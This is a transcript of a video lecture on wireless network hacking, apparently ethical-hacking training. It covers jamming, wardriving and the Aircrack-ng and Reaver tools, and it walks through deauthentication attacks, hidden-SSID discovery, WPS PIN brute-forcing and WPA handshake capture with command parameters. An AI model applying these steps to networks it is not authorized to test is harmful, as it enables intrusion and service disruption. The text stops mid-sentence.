of attack is via jamming. No, you're not buying that joke? What about this one? Traffic jam? No? How
about a paper jam? Still not laughing?Ok, I'll get fun now. How about jamming with your favorite
band? Yeaaah, that's me with Collective Soul. Still not buying it?How about just going out and
jamming? No? Still don't get it? How about just putting the rock in the hole? Jamming the ball.Ok,
that's actually a picture of my son-in-law when he was a little younger. No, he can't really jump that
high. He just came off of our trampoline in the backyard. But the angle looks good, doesn't
it? (laughing) So, jamming is exactly what it sounds like.It's where we have a Wi-Fi access point, and
we deny services. I personally think sometimes that I wish I had a mobile jammer,here's one right
here, that I could turn on in the movie theater for those young'uns that start talking on their phone or
texting during the movie. And you can buy a device like this off of the internet. Now, jamming is also
extremely popular, especiallywhen it comes to dealing with criminal activities. This is actually a
jammer that does several frequencies, including not only cell, but Wi-Fi, Bluetooth, everything. And in
this case here, you can see law enforcement's using it. They'll use it in a hostage negotiation
situation, so that they can block all signals and control the environment. They also make them so
that they're extremely portable for military. In fact, here's one interesting one. It's a jamming
grenade, where you can just toss it in to a particular room. No explosions, just jamming of a
signal. Actually, if you unscrew the top of that, there's jelly inside.

Summary
Ok, so in this module, we went through and took a look at several things. One of them being the types
of wireless attacks that can take place on your network. If you remember, those included things
like confidentiality attacks, integrity attacks,availability attacks, authentication attacks. And then we
went through and talked about attacks on the access points, things like a rogue access point, or AP
MAC spoofing, or an unauthorized association, or even the famous HoneySpot AP attacks.And then
finally we quickly looked at the attacks on the clients, which included anything from our ad-hoc
attacks, our denial-of-service attacks, and, of course, we got our jam on. So not that you understand
these concepts, we're next going to go through and take a look at the methodology of hacking
wireless. You might see some similarities between the methodology of hacking wired networks with
wireless. 'Cause, when you think about it, it really is all the same, right? Network is a network is a
network.

The Methodology of Hacking Wireless

The Method of Hacking Wireless

So believe it or not, there is a methodology when it comes to hacking wireless. When it comes to this
methodology, I'm often reflective upon a famous quote by a very shrewd businessman whose name
is Mr. Burns who often says, "Make sure that you release the hounds," meaning, "let's go after this
thing full-heartedly." And a lot of the times, we can do that without being very active at all. In this
module, we're going to go through and we're going to take a look at the method to the madness. And
that is, we're going to first look at how do we find Wi-Fi networks doing Wi-Fi discovery. Then we'll
take a look at GPS mapping. And what I mean by this is being able to obviously pinpoint where the Wi-
Fi networks are located. This isn't like a cable that you can actually trace, so we need to have some
type of way of marking this. We'll then go through and take a lookat wireless traffic analysis followed
by finally launching the attacks against the networks, and then finally going through and cracking the
encryption. Now if you try to skip through any one of these methods within the methodology itself,
you could possibly end up not being very successful in hacking to the wireless network. So let's get
going with the step one.

Wi-Fi Discovery

So Wi-Fi discovery is your first step in the methodology of hacking wireless networks. And we always
look at this in the same aspect that we do with standard networks that we need to first see what's
going on around the environment itself. And if you remember from our previous courses, one of the
first steps that we go through is the process of footprinting or reconnaissance. All we're doing here is
just taking a look around. And I like to refer to this process as kind of like a looky-loo. If you're not
familiar with that term, let me give you a description. In my state, it just so happens that if you're on
the freeway driving down the road and there's an accident on the other side and you can't see it,
you're required to slow down and see if you can see what's going on, thereby slowing down traffic on
the opposite side, which is nothing but totally frustrating. That's just some road rage. But we refer to
those folks as looky-loos. If you remember, when it comes to footprinting, this is simply where we're
trying to locate and understand the network itself. And we're going to do that a couple of different
ways. One of the first ways that you can use is a passive method. If you remember what we talked
about in previous courses as well, is passive is just sniffing the airwaves, seeing what's there. We're
not hitting anybody. We're not trying to connect with any access point. We're just looking on the
airwaves itself. Then we also have, obviously, active, which is, obviously, a little bit more
intrusive. Maybe I send out a probe request with an SSID to see if an access point responds. Either
way, to accomplish footprinting, you're going to need a couple of things. You can either use your built-
in Wi-Fi network cards on your laptops or your tablets. Now there's some limitations to these. It's
based off of what we refer to as the chipset and the manufacturer,which we'll talk about a little bit
later on. A limitation of built-in Wi-Fi also is that it's not very directional because it's like 360 degrees
from the laptop itself where I can start using external antennas to start pointing like a Yagi. Remember
our Yagi antenna? I can hook that up to a Wi-Fi card and start pointing in different directions. And
then the other thing I'm going to need here is obviously an application. And yes, I have a plethora-
- See, you didn't think I was going to get that word in on this course, did ya? I have a plethora of
those, some of them being desktop applications and some of the newer ones actually being based off
of mobile. Some of the more common desktop applications include inSSIDer, which is an open
source, multi-platform, Wi-Fi-scanning software. And it'll give the attacker information, such as the
proper channeling of wireless networks, signal strength. If the access point is filtered, then, of
course, we can export the Wi-Fi and GPS data out to an XML file that we can then use inside of Google
Earth. Another product that's out there is called NetSurveyor. This is, again, a network discovery tool
that's used to find wireless access points in real time. It's a little bit more GUI as far as its interface is
concerned, so it's a little prettier. There's also Vistumbler, which does the same thing, looking for
access points, we can export the information,import it in to Google Earth. We can look for signal
strengths. This product actually got its name when Microsoft released Vista and the poor lady in server
software, which would've been server '08, they had a new NETSH command that was called WLAN
show network mode equals BSSID. And it uses that command to get all the wireless
information. WiGLE.net is one of my favorite ones. In fact, I'm going to show you WiGLE.net a little bit
later on. WiGLE.net is an open platform and also a website for collecting information about
different wireless hotspots around the world. It actually started off back in 2000, and by 2013, they
had over 170 million recorded Wi-Fi networks in its database. And out of the 107 million, 105 have
GPS coordinates. We also have something called Kismet. Kismet is a layer 2 wireless network
detector, sniffer, and IDS environment. There is also iStumbler. This is actually a discovery tool that
provides plug-ins for finding, not only access points,but Bluetooth devices, Bonjour services, location
information on Mac-based devices. They have a mobile version that's called miniStumbler that used
to run on the old, ooh, I'm going to bring back some memories here. Anybody remember the iPAQ by
HP, one of the first real handheld devices? And speaking of mobile, we have a couple different
products both in the Android side and on the Apple side. We have Wi-Fi Manager as well as Wi-
FiFoFum. Yeah, insert your own joke there. There's also Network Signal Info. There's Wi-Fi Radar as
well as there is my miniStumbler and the Wi-Fi Analyzer tool. And I'm sure that there's probably even
more since the recording of this course. It's like they're coming out daily now, right? So with at least
two of those three things, again, remember, some type of antenna, either the built-in one or an
external antenna, and a piece of software, we can go looking.

GPS Mapping

So I'm sure that everyone is familiar with GPS, or Global Positioning Systems. We know that these are
big old satellites that are up in space, right? And they help to determine where we're located or where
something is located. Well, taking this technology along with wireless technology, we can actually go
out and hit the road and start mapping out some networksthat either we can remember for
ourselves or share with others. Now, again, the GPS receiver is going to just simply go through and
calculate position, time, velocity to help pinpoint where the network is located. Now, some of the
tools that we can use for this include: I mentioned WiGLE already, and I'm going to show you WiGLE
here in just a second, but we also have Skyhook. Now, Skyhook is a big data company that's based out
of Boston, Massachusetts. And originally they were started up as a database for gathering access
points for wardriving folks. Since then, they've gone on to provide location-based services for
companies like Apple, Samsung, Sony, HP, Dell, and almost any of the mapping products out there like
MapQuest. And some of these concepts or these applications come around from the aspect of
marketing. For example, when you walk into your local retail store, maybe Skyhook has determined
via your Samsung device that you're at the local, I don't know, butcher market, and you get an ad for
that butcher. But again, using their technology for evil, we can accomplish some interesting things. We
also have something called WeFi. WeFi is just a little simple program that helps you to find Wi-Fi
hotspots. You can either install it, search out hotspots near you. You can send the information up to
their database. You can also type in an address of where you're trying to go to to see if any Wi-Fi is
going to be available there for you as well. But enough talk, Dale.Let's do some wardriving. OK, let's
hop in the car. I'm going to take you for a ride, and we'll see what we can see here. So when it comes
to wardriving, the overall concept is I'm going to cover a lot of area and try to pick up as
many accessible access points that I can or networks that are exposed. It's kind of interesting that
when it comes to Wi-Fi, we don't really realize how prevalent it is in our world. Now, granted, we have
our devices that we all hook up to Wi-Fi, but you start multiplying that by the number of people that
are around you and you end up with a ton of wireless transmissions going on everywhere around
you. So I once had a gentleman from Raleigh come out to visit us because we were getting some
interference back when I had my own ISP service. And we couldn't figure out where the
interference was coming from. And he brought out what we refer to as a spectrum analyzer with
him. And it basically showed him all the wireless that was around us, whether it was 2.4
gigahertz, whether it was five gigahertz, whether it was a microwave. It was kind of interesting
because he told me, he said, "You know what, we can't see wireless around us, "but if we could see it,
and you could assign a color "to each frequency, we would see a rainbow "all around us." And when
you start thinking about how many wireless devices you have in your home, average is about 13
devices per house, think about that, 13 devices per house, and most homes have anywhere from
obviously one to two Wi-Fi access points. So the question that comes in is: are they securing those
down?And it's not just residential folks, but it's also businesses, especially small businesses that don't
have a full-time IT person that can go through and make sure that things are locked down for us. So
when it comes to wardriving, we're not necessarily just looking for standard Wi-Fi access points. We
can also use this technique to find Bluetooth. Now think about that one for a second. Bluetooth. What
do we sync with Bluetooth nowadays, if I'm driving down the road? Yeah, our cars. Do we not upload
our address book to our cars so that we can make wireless calls or hands-free calls? Well, literally,
driving down the road, I can pick a Bluetooth, pick up a Bluetooth signal from the car next to me. All I
have to do is keep pace with him. And if he's not secure enough, I can download his address book or
possibly upload a piece of malicious software that executes on his devicethat allows me then to pown
his environment. So, number one rule when we're using Bluetooth is we turn it off unless we
absolutely, positively need it. Now when it comes to wireless, our goal for wardriving is again to go
through an area and pick up which access points are where, whether they're open or closed, because
that helps me to assign my target. When I'm choosing my target, I'm going to go after things like the
most common aspects like default SSIDs. But if I come across a retail location, like a bank, even though
they may be locked down, I'm going to try to figure out what SSID that they're using so that I can go
after and maybe intercept some of the transmissions going on within that business itself. Now, back
in the old days, when we did wardriving, we had to use laptops. We still use laptops. But it's kind of
interesting how technology has changedthings because now we can actually do wardriving with our
phones as well as with our tablets. That's what I'm going to attempt to do here is, I didn't bring my
laptop. I decided to try to do this with a tablet instead. So I'm going to be using a program called
WiGLE. which is kind of an open project where I can use the application to map out my
neighborhood and find out what access points, and then upload those to the WiGLE servers, and then
everybody else around me or other attackers or even just hobbyists can see what's going on in that
area. I've got a neighborhood come up here. Let pull in and see what we can find out with my, just
with my tablet now, mind you. So what I'm doing here is I'm using my cellphone as a access point for
my tablet, 'cause my tablet doesn't have internet access. And I have my own access point set up for
that, so you're going to see that pop up. So the application I'm using is called, again, WiGLE. And you
can see here that I've got the bat signal which is my own phone. That's what's giving me internet
access so I can then upload this information if I need to.And what I'm looking for here is I'm looking for
access points that might give me a direction or a concept of who's using what.Primarily, what I'll be
focusing in on is those people that are still using the default SSID for access points, like Linksys or D-
Link or Netgear. I might also look for things like access points named after people's homes. So I'm
going to start off here, right now,I just pulled over, I'm picking up 16 access points. So we're going to
just drive down here a bit and see what we can pick up. 117, new Wi-Fi 16, new cell zero, from 41.6
feet. 9:55 a.m., battery 26%. Now, normally, when you're wardriving, you want to stay at a pretty low
speed, under 35 miles an hour, just because you need time for the device to pick up those access
points as you're driving by. If I was doing this on a freeway, it wouldn't make any sense, unless I was
trying to pick up the Wi-Fi access point off of a car, which, cars are now coming with wireless internet
on them. Now, the cool thing about WiGLE too is it links in to Google Maps, so I'll be able to actually
see this in a Google Map environment. That's what makes it really easy for me to share
information and also for me to, if somebody's already hit this area, it makes it easy for me to see
what's going on or what my possible targets would be. So a lot of people think, "Well, it's my
wireless "access point. "Who really cares about my home network?" Again, you have to remember,
the goal of the attacker is not necessarily to get a hold of your information but maybe also get a hold of
your resources. I have a good friend of mine who has a dog, and the dog did not bark hardly ever at
all. And one night, he woke up, and the dog was just barking like crazy. And he went to go see what
the dog was barking at.The dog was looking out the front window. So he looked out the window, and
what he saw was a car with two individuals inside, and because it was dark, it was like two in the
morning, he saw a glow, kind of like what you'd see in the movies, of a laptop, and he thought to
himself, "Why are people in front of my house with a laptop?" And because he's an IT, he went, "Oh,
crap." So he ran downstairs. He unplugged his wireless network. And about 15 seconds later, sure
enough, they drove off. And I'm really glad that he didn't recognize me. So remember, you're a
number. You're a resource to attackers. I don't care if you have a bazillion dollars in the bank or if
you've got five dollars in the bank. I'm going to get at you somehow. Okay, so I've driven about a
mile, and not just in one direction. I've actually weaved in and out throughout this neighborhood
here. And within the one-mile distance that I traveled, I have 103 access points. I guarantee, there's
not 103 homes in this environment.One of the things-- 107 new Wi-Fi, 105 new cell zero, from 1.3
miles, 10:02 a.m., battery 24%. Let me turn off the audio here.And so, one of the things I want to do
is you can see here that I've got a couple of different access points. And one of them that I'm kind of
interested in here is the one that says, "Netgear Guest." Now, as far as these icons are
concerned, you'll see these fluctuating a bit here, the green ones tell me that they're locked down. The
red ones would represent then a open access point. Now, a lot of people realize that it's open, and
what they rely on is something called MAC filtering, which we've talked about in previous
modules. That MAC filtering is not a secure way of securing down your network, because all I have to
do is tell my tablet or my laptop to be the same MAC address that has access to the access point, and
I'm going to pown you.So you can see here, we've got like Flying Dutchman, I've got Honey. Oh, there's
a MyQuest. There's a Buffalo Jean, which is probably a Buffalo router. There's Netgear Guest. Again,
that's one I want to take a look at probably. That one happens to be WPA-enabled and locked
down. There's also a Belkin one listed here. It's going in and out. The reason why it's going in and out
is because I'm not quite close enough to sync in. So I'm going to drive up here a little bit further and
see if I can lock in to a better target. Okay, so I'm coming up on one here. It's called Linksys. Gee, I
wonder what access point that is. So you'll notice it's in red. If I click on it, it opens it up in Google
Maps as well as gives me some additional feedback as far as the signal strength. It gives me the MAC
address of the device. And by the way, this application, if you think hiding your SSID is going to stop
me, it'll look at those, too. It'll discover those as well. And you could see here, I also have an ability to
connect. I don't have permission to connect to the network because that would be illegal, so I'm going
to cancel that. But if I was doing something malicious, I would obviously look in, and I would probably
be able to see some of their devices they have on their network. So what's really nice is with
WiGLE.net, what they've done is they've taken advantage of what Google has done.Google, if you guys
all know, when they do their little Google car that goes around and gets street view, Google was
actually capturing Wi-Fi access points. And that's one of the things that I can do with my Android
device, is I can say, "Please help me find where I'm at via GPS, "as well as help me triangulate via access
points." Well, because of that, what you're seeing on the map here shows me the address of what a
combination of my signal strength plus what Google Maps had mapped out for me already. Now, this
application in tablet mode doesn't allow me to actually fully connect in. If I had my laptop, I would be
able to jut pop right in. The other thing I can do here with this application is I mentioned that it's an
open project. If I go back here, I have this button up at the top left that says, "Upload to WiGLE.net,"
which allows me to upload what I've discovered to the network, as well as I can download what other
people have discovered in the area or kind of clean up I guess the records, if somebody hasn't been
out here in a while. And it allows us to then... I'm going to go ahead and click on my little world map
here. You can see all the access points and where they're located here. So you can see, there's a couple
of Netgear access points. Typically, the question then comes up, "Gail, how do I protect myself from
this?" You can't. It goes back to that aspect of, "I know the danger, but I'm willing to accept the
danger "for the payoff." Just like, "I know the danger of driving a car. "I have a really high risk of getting
in a car accident "obviously the more I drive my car. "But I'm willing to take on that risk. "I know about
other drivers. "I protect myself hopefully from other drivers "by defensively driving." So as IT security
specialists, we need to make sure that we take advantage of every single feature that different routers,
and you should research your routers, find out which ones are more vulnerable than others. But we
need to look at each one of those features and use every single feature because, again, remember, you
can't stop an attacker. Your job is to slow them down.

Wireless Traffic Analysis

Okay, so we've gone through and discovered our wireless networks. We've used our GPS mapping to
get their locations. The next step is then going through and doing wireless traffic analysis and
determine any vulnerabilities that may be in this network. And we're going to do this a couple of
different ways. The first thing that we'll do is actually look for vulnerabilities.And this can be done just
like we normally do on our wired networks. And again our whole purpose here is to determine an
appropriate strategy for attacking the network. The other thing too here that you need to
remember, and I've mentioned this a couple of times, is that again this is wireless, so the traffic itself is
just flowing through the air, and it isn't serialized, which makes it extremely easy to sniff and
analyze the packets. The next step of attack is then going through and doing a little bit more in-depth
reconnaissance. We'll be looking for SSIDs, whether they're hidden or being broadcasted. We'll also
take a look at access points, how many are there. We'll try to discover the encryption being utilized, as
well as the authentication that they're trying to use. Now, some folks ask, "Well, Dale, why do we
need "to know how many access points they have?" Well, twofold. First of all, it gives us a kind of a
layout of the network infrastructure itself. But more importantly, I'm going to be looking to see if all
the access points have been patched. A lot of times, especially when companies have multiple access
points, they may do further more upgrades for one or two, and they forget one. That could be my
door into your network.And there's even more cool tools out there that will help us to determine all
these reconnaissance requirements or issues.Those include things that we've seen already, including
Wireshark, 'cause, again, packets are just going through the network.Wireshark can sniff that out. And
we might need some additional plugins. We'll talk about one of the more popular ones herea little bit
later on. But we also have some very specific products out there for wireless, including AirMagnet,
OmniPeak, and AirSnort. We interrupt this program to talk to you about "cards." No, not these type
of cards. I'm talking about wireless cards.When you're trying to implement an attack against a network
via Wi-Fi, choosing the right Wi-Fi card is extremely important because some applications won't work
correctly, or I should say they only work correctly with certain types of cards. And it also depends on
what the attacker is trying to accomplish. For example, by default, Windows can listen on the network
but doesn't have the capability of injecting data packets, where Linux actually has the ability to inject
and listen. Boy, that looks like a painful-looking picture. So when it comes to cards and your choice of
cards, you need to understand a couple of things.First of all, there are two manufacturers of a
card. There is the manufacturer of the brand of card and then there's the manufacturer of the
chipset of the card. Knowing the card manufacturer and model isn't necessarily enough information
to choose your Wi-Fi card. You've got to know about the chipset. Now, a lot of manufacturers don't
like to reveal their chipsets, but don't worry, Very easy to determine a chipset. You can simply do a
search on the internet. You can look at the Windows driver file names, because often, the driver name
itself has the chipset in it. You can check the manufacturer's page and really drill into the specs of the
card. And the other thing you need to be careful about is that many times, the manufacturer of a
card will change the chipset while keeping the same model number. So in some cases, I've seen folks
actually pop the covers off so they can actually look at the chips. Often the chipset number can be
seen directly or is printed directly on the chipset itself. Now, you also want to verify the chipset
capabilities. What I mean by that is if the chipset is not compatible with the operating system, or it
doesn't meet the requirement of the application, it may be of no use to you. You'll also want to make
sure that drivers are available. You also want to determine if the drivers had been updated or if they're
available for the different operating systems, especially when it comes to Linux. Now, one of the more
famous cards out there was an old PCMCIA card that was called the ORINOCO Gold card. In this case
here, you can see that the manufacturer was Proxima, but the chipset was ORINOCO. And the reason
why it was so popular is you probably can't see it, but down there where it has the name Proxima on
the far left, there's a little cap, and that cap could be used to attach an external antenna such as a
Yagi. Back in my day, I actually had one of these that I plugged into my HP iPAQ. Now, go figure. I was
able to sniff networks with miniStumbler, a Yagi, and this card. It was really quite cool. Now, one of
the more popular products out there is referred to as AirPcap. AirPcap is actually an adaptor. You like
the ominous look there? It's because they're the big boys in the block. You don't mess with
them. They're extremely cool. The product is extremely cool. It allows me to sniff packets and link it
directlyinto Wireshark if I want to. The downside to it is it's not cheap, but cheap is a relative term. The
adapters themselves, there's different models, but they range anywhere from about $300 up to about
$2500. And they're simply a little USB adapter that you plug in. Now, with this adapter, an attacker
could configure it to decrypt a web-encrypted frame. Now, if monitoring a single channel isn't
enough, again, depending on the model, you have a multi-channel adapter, as well as you can plug in
multiple AirPcap cards inside of the same network card, so you could capture different frequencies if
you'd like. Again, depending on the card that you pick up, it also has the ability to do injection. Again,
by default, we mentioned that Windowsdoesn't have that capability. But adding an AirPcap card, I can
definitely overcome that. It also has a lot of support for third party applications including Cain & Abel,
Wireshark, and Aircrack-ng. But wait, there's more! It also includes an AirPcap software
distribution that replays 802.11 network traffic that's inside of a trace file, so you can always do a
replay. Obviously, that requires a little bit more money. "But, Dale, is there an alternative out
there?" There's really not. There were some rumors of a company called Acrylic that is working on a
competitive product, but AirPcap kind of pretty much owns this market. You may want to check with
Acrylic after watching this video, in case they've come out with that product. Last I heard, it was in
beta.

Launching Attacks

Okay, so you're ready to start launching the attack, right? Well, in order for us to accomplish this, you
can use probably one of the most powerful tools out there right now. IIt's called Aircrack-ng. And
Aircrack-ng is not just a simple application. It's a suite of applications that's designed to really target
in on the wireless environment. "Dale, when you say 'a suite,' what do you mean by that?" Well, there
are several different products inside of this particular product, and it's open source. And what's really
cool is that it's basically free. It's done through a GNU or a general public license. Now, when we talk
about Aircrack-ng, there are several different products within it, one of them being Airbase-ng. This is
designed to go through and capture WPA as well as WPA2 handshakes, and it can act as a ad hoc
access point. There's also, of course, Aircrack-ng itself. This is the standard web and
WPA/WPA2/PSK cracking tool. There's also Airdriver-ng. Yeah, I tried to say that one fast. Now,
Airdriver-ng is actually deprecated out of the latest version of Aircrack-ng. As well as Airdrop-ng. This
is a program that we can use to issuede-authentication attacks or to break that connection between
the client and the access point. There's Aireplay-ng. This is designed to create traffic and fake
authentication packets, as well as request injections. There's also Easside-ng. This is a nifty little tool
that allows you to communicate via web encryption with an access point without knowing the web
key. Other tools include Airodump-ng. This utility is used to do packet capturing. It also has the ability
to link in with a GPS receiver if you have one hooked up. There's also Airgraph-ng, which basically goes
through and maps out, or I should say, creates graphs based off your Airodump CSV files, allowing you
to see things like client to access point relationships. There's Airolib-ng, which is another utility that's
designed to store and manage password lists, ESSID lists, and then try to compute their Pairwise
Master Keys and use them in a WPA/WPA2 cracking session. We also have Airserv-ng. Airserv-ng is a
wireless card server that allows multiple wireless applications to independently use the wireless
card in a client server connection. I bet you can't guess what Airmon-ng does. Yeah, you're right. We
use it to enable the wireless NIC card to start monitoring the wireless interface in looking for different
access points. Airtun-ng is a virtual tunnel interface creator, and it has two different functions. One, it
can allow all encrypted traffic to be monitored for the purpose of using it as a wireless
intrusion detection system, but it can also inject arbitrary traffic into the network. But wait, there's
more! We also have Packetforge-ng. Anybody want to take a stab at that one? Yup, it's used to create
encrypted packest and inject them into the network. We also have Tkiptun-ng. Now, this particular
utility, at least as far as the time when this course was recorded, hasn't been finalized yet, but it's a
utility that's usedto inject some frames into a WPA Tkip network with QoS or quality of service. There's
Wesside-ng. "Why do you teach this?"There's a war going on." Okay, sorry about that. I stepped into
my Broadway musical, West Side Story mode there for just a second (laughs). Well, Wesside-ng has
several different techniques that it can utilize to obtain a web key in just a couple of minutes. And
there's WEP de-cloaking. Now, there's got to be either a Star Trek reference or a Harry Potter
reference here. So, this is a utility that actually removes WEP cloaking from a Pcap file. Some wireless
intrusion prevention systems actively try to prevent the cracking of a web key by inserting what we
refer to as "chaff." Basically, it's a fake WEP frame. Now, if you're familiar with the military aspect of
chaff, it's kind of the same concept. An aircraft carries chaff rounds which when a missile locks on to
them, they shoot those off. And it's basically lots of foil or pieces of metal that are designed to confuse
the missile.So in this case, the chaff is implemented and added into the air to kind of fool programs like
Aircrack-ng. Now, there are some rare cases where if the cloaking fails, the key can be recovered
without removing the chaff. But in cases where the key cannot be recovered, we can then use this
tool to filter out that chaff. Then we have something called AirDecap-ng. This is what happens when
you're out in the baseball field with your baseball hat on, and a gust of wind... Ah, never mind. This
utility allows you to decrypt WPA2, WPA, and WEP captured files. Now, some of these programs you
may never use within the Aircrack-ng suite. I just want you to understand that because it has so many
utilities inside of it, you could say it's a "sweet suite." You get it? See how I played on that one?

Let's Go Look-ng

So let's take a look at how we could use Aircrack-ng to find hidden SSIDs, because everybody always
tells me, "I'm hiding my SSIDs so nobody can find me." Well, guess what, I can. Now, I need to
apologize. I really, really wanted to be able to demo this slide for you guys, but because our machines,
our Kali Box, is virtualized, there's no way to pass through a USB wireless NIC card as a wireless NIC
card. It gets picked up as a standard ethernet card. So you won't be able to do this in your own virtual
machines, nor was I able to do it on mine. You would need a full outright deployment of Kali running
on your laptop or PC. But I am going to show you what you would type and the responses that you
would see. So the first thing we'd want to do from a command prompt is we'd want to type in the
Airodump-ing at WLAN1, or it could be WLAN0. It just depends on where your wireless NIC is. And we
would see a readout that would be something similar to this. Let's let this finish typing out here for
you. Now, you could see that one of the devices we found has a hidden SSID because look at the
ESSID. It says the length is six, which means that it's the number of letters in the SSID. Now, sometimes,
we may not see the number, but the length doesn't really matter to me. What matters here is I've got
an access point or a device that's not identifying itself with an ESSIDwhich tells me that it's
hidden. Now, in order to discover what it is, all we have to do is do a de-authorization on the client. And
when the client re-authenticates, it'll send the ESSID through the air, allowing us to take a look at
it. Now, before we go to the next step, I want to make sure I make a not of, in particular here, the
channel of this device. You'll notice that it's on channel six. And there's my BSSID, which is the
28EF01353485. So you make a note of those. Let's run our Airodump program againwith a couple of
parameters to help us filter some stuff out. The first switch is a -"c," which specifies the
channel, because I don't want to be hitting everybody. I'm then going to specify the BSSID, which,
again, is that address we saw previously.Again, remember, ending in 85. And then, finally, what
network interface I'm using, which in this case here is WLAN1. And the results I would get back would
look something like this. Now, this looks very similar to what we saw before, except where we focused
it again on a particular BSSID, but here at the bottom, you can see that it's actually associated to a
client machine that has the MAC address of the 28EF01234567. So, our next step is to make that
machine lose connectivity to the access point. Remember, our goal here is to make this client
machine re-associate so we can see the SSID. And how we're going to do that is to use the Airplay-ng
command with also some parameters. Let me explain these to you as they type out. The first one is a
"-0," which represents the attack mode. In this case here, a zero is a de-authentication attack. The
next number, in this case here, 30, represents the number of de-authentication attempts I want to
push at the target. In this case, I'm going to throw 30 of them. The "-a" followed by the MAC address is
the target access point, followed by a "-c," which, yup, you got it, is the target client access point. And
then, of course, the line connection that I'm going to cross. Now, at this point, you'd want to switch
back over to your terminal window that has Airodump still running in it. And you would see something
like this. You can see here that it caught the name of the SSID being called "hacked" during its re-
authentication. "Easy schmeezy, Dale." I know. It's actually kind of scary. Actually, there are several
different programs out there that do this for you automatically, as you're looking for Wi-Fi
connections. NetStumbler does this in the background, as well as WiGLE.net. So we've got the
SSID.The next thing we need to do is look at cracking the encryption, right?

Cracking Wi-Fi Encryption

So now as an attacker may have gotten unauthorized access to the target network by doing things like
placing rogue APs, evil twins, finding out what the hidden SSIDs are, the next step is to crack the
security that's completely stopping us. Now, how we achieve this totally depends on the encryption
that's being utilized. And there are many tools based off of our requirements.We obviously know
about Aircrack-ng and its suite of tools. On the MAC platform, we have something called KisMAC,
which is basically a playoff of Kismet, which is designed to run on a Linux environment. KisMAC,
though, has the ability to scan networks passively on cards that it supports, like Apple's Airport or
Airport Extreme. It has the ability to crack WEP and WPA keys or other flaws such as weak
scheduling or weak generated keys. It can also, with the right card, do a packet injection. It can draw
area maps of network coverage. It can implement a de-authentication attack. And, besides, who's a
cute little beaver? That is a beaver, right? We also know about Kali Linux which has... Ooh, another
day to use my phrase, It has a plethora of tools. We've just talked about Aircrack-ng, but it's got a ton
of tools as far as wireless cracking is concerned. It also has KillerBee, Bluepot, BlueRanger, RedFang,
Wifi Honey. We could spend hours going over that information. And, of course, if you're on the
Windows platform, good old Cain & Abel also has the ability to do some cracking for us. Now, in the
aspect of Cain & Abel, well, some of these other products, many times we need still that AirPcap USB
dongle to get it to work correctly.I'm sure there's other tools you guys can think of as well. I know
there's, what, L-com wireless security auditor. There's CloudCracker and other online services. But
usually in a Cloud environment, they crack your key. It's like 17 bucks, which really isn't that
expensive, when you think about it. But enough talk. Let me show you what you could do with
Reaver, which is a utility inside of Kali Linux.

Let's See How Much Damage We Can Do!

Now, again, I've got to apologize to you, folks, 'cause I was really looking forward to showing you
this on a live Linux box, but we have that same limitation as far as the wireless NIC is concerned and
getting into a virtual machine. But because I love you, I've done some screenshots to kind of show you
what would end up happening. Let's first take a look at Reaver. Reaver, again, is a neat little utility
that, at its basic element, allows me to actually hack WPA2 via WPS. Now, if you're not familiar with
WPS, this is the nifty little protocol that allows home users who don't know anything about wireless
security and might be intimidated by the magical blue box with antennas on the back of it to be able
to push a button and type in a code on their device to link it in to the Wi-Fi network. The security flaw
here is that the WPS key is burnt in, so what we can do is we could take advantage of this by trying to
recover the WPA's PIN within a couple of hours using just a simple brute force attack. And with the
WPA's PIN, we can then get the network's WPA/WPA2 pre-shared key, which we could then, offline,
crack if we want to. So how do we implement this? It depends on what you know. But at a very basic
level, we could just simply type in Reaver with a "-i" for interface, followed by a "-b" which would be
the BSSID of the target. But you may not know all those things. The first thing you need to understand
is: does the target have WPS enabled? If not, this isn't going to work. We also need to make sure we
know what the BSSID is of the network. So we're going to dip back into our utility belt and break out
the airmonitoring tool again. If you remember, we just simply type in airmonitoring with a start on
WLAN1. Again, this would all depend on if your wireless was WLAN1. It could be WLAN0. But what we
would see as a result is something like this. It does show us some processes that could possibly create
some problems for us. But here at the bottom, you see WLAN1 chipsetbeing Ralink and My Driver. And
you can see that I'm now in monitoring mode. Well, after we've done that, the next step would be then
to type in Airodump-ng with the parameter of mon0. This is simply alias for WLAN0 in this case to be
in promiscuous mode, meaning it's going to intercept traffic. And my results would give me something
like this. Now, you'll notice here that the built-in 3D94 is using WPA2, so I want to make note of not
only the channel again, I'm always looking at channels, I don't know why, as well as the BSSID, so then
I take that information. And you remember the first statement wherewe used Reaver? Well, I'm going
to type it in again. But now I know the interface is going to be mon0 followed by a "-b," and then put
in the BSSID. Then I can do a double v here, which is going to give me a very verbose output. And I
would see something like this. I should preface that it might take a couple of hours before I see
something like this. It depends on the key itself. In this case, I was able to crack the PIN in three
seconds because, let's face it, 12345670 is not a very strong PIN. "Yeah, Dale, that's cool, but how
about just "hacking the pass code for WPA or WPA2? Well, in order to do something like that, we can
go back to our suite of Aircrack-ng. Again, the first thing you'd want to do is go through into an
airmonitoring to disconnect from all the wireless networks. And you would see something like this
respond, again, showing your WLAN interface as well as your chipset in your driver. We would then
want to start up our airmonitoring again by doing our airmonitoring start command. And we would
verify that in fact we did get monitoring mode enabled on, in this case here, mon0. Our next step
would then be to type in Airodump-ng, following by the name of the monitoring interface, in which
case, we would see something like this, which would show us now a list of all of our wireless networks
in our area. So I'm going to be focusing in on this top one here that has D-Link as the ESSID, and the
BSSID ending in D5. My next step is I'm going to then go through and do an Airodump using channel
11 because that's the channel it was on. Its BSSID again ending in D5. And then specifying this neat
parameter called "-w," and then a path statement, followed by, again, mon1B and the network
interface. Now, the "-w" and the file path command specifies where Airodump will save any
intercepted four-way handshakes.In this case here, I'm going to just save it on the desktop. And then
after some time, I should actually see a client machine pop in. And if it doesn't, we can obviously do
the de-authorization attack that we've talked about before. But in this case here, you can see that I've
got a station that's hitting with a MAC address that's ending in 4E. Now, if I switch over to a second
terminaland leave Airodump continually running, Now, this should all look familiar because the next
step that we did previously is we used Airplay-ng. Again, we specified the zero, which is the
shortcut for a de-authentication attack. Again, the number two being the number of packets I'd like
to send, followed by the "a" for the access point MAC address or BSSID, and a "-c" for the client MAC
address, and again specifying mon0 for the network interface. When you hit Enter, you're going to get
a response back, and one of the lines you're going to look for is this one: WPA handshake, and the
MAC address of the access point.Schwing! This means that I just captured the four-way
handshake. And the password is now in my directory on my desktop.And from here, the whole process
of cracking that is just on your preferences. The file that's stored on your desktop is going to be called
a .cap file. So, in this case here, I could use Aircrack-ng with a "-a" for attack, and the attack
mechanism will be the number two, not the number of packets. This is the method which in this case
here is a WPA method. The "b" stands for the BSSID of the router, followed by the "w," which is in this
